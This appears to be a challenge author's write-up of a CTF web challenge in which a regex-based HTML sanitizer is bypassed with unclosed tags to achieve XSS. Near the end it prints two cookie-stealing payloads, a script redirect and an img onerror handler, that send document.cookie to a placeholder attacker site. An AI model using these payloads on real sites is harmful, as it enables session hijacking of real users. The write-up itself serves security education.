Table of Contents
This is the author’s writeup for the challenges
MyHTMLSan in the web category.
This describes the intended solution when I made the challenge.
Challenge description #
LiveOverflow inspired me to host html files, I hope I made them safe enough.
There was no source code for this challenge, only a link to the website.
My Notes #
- This was meant to be an easy challenge.
- The inspiration for the challenge came from LiveOverflow’s video on HTML Specification.
- Source Code can be found here.
- Could have locked it down further with a black list or set the headless browser to not follow redirects.
Notes to future self when setting up this challenge. #
- Spend more time to check for unexpected solutions
The Website #
When we first visit the website, we are greeted with a simple website with a form where a user can submit their HTML Code. We also see an embed LiveOverflow Video explaining the HTML Specification.
After submitting our HTML code, we are greeted with a page that shows us the output of our HTML code (if any). There is also a Report to admin button that we can use to report this link.
The submission location is using
UUID to prevent users from guessing the location of other submissions.
Looking at the question #
As you can see from the image above, we can see that normal text is not sanitized by the page. Let us try to use some HTML Tags.
<h1>test</h1>, we see the following output.
We can see from the above that the
h1 tags were stripped.
To complete this challenge, we will have to find some sort of
XSS vulnerability within the website and prompt the admin to visit the website to exploit it.
Finding the XSS vulnerability #
Another hint that we have yet to look into is the
He also mentions specifically that any opening tags
< followed by numbers,
IE: [0-9] are not counted as HTML tags and will be rewritten.
Let us try the example that he gave in the question,
We can see from the image that this too was stripped from the output.
Hmm… maybe there was something else in the video that hints at the answer for this question.
Towards the end of the video, he talks about how HTML Cannot be parsed using regex. He then shows us an example of a regex that he found online that can
Perhaps the sanitizer is made from regex.
Regex from the video #
The post that he mentioned in the video here
The main regex that was shown is
<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is used to match HTML tags.
However, there are some issues with this regex.
It does not match any tags that do not have a closing tag. (IE:
<br instead of
Let us try it out on the website.
For the above result, we submitted the payload
<h1 without the closing tag.
As you can see from the rendered
h1 tag was not sanitized.
The solution #
Script Payload #
With the payload above, it was shown correctly as a script tag on the page.
However, the chrome browser blocked the loading of the script.
This is due to a feature in chrome which blocks Cross Origin Reads for more information you can visit the link above.
TLDR: Chrome blocks the loading of scripts from other domains which are not of content type
Thus, to make it work, we will have to make use of tools like
Over here we can edit the payload that appears when someone visits our website.
Now that we can trigger an alert, we can simply change the script to a redirect request before reporting the page to the admin to get the flag.
document.location.href = "<your site here>?cookie=" + document.cookie;
We can simply redirect to the page that we want with the admin’s cookie and retrieve the flag.
Img Payload #
There is also an alternative using the
img tag as well
<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"
This will have the same effect as the script tag above (and is faster).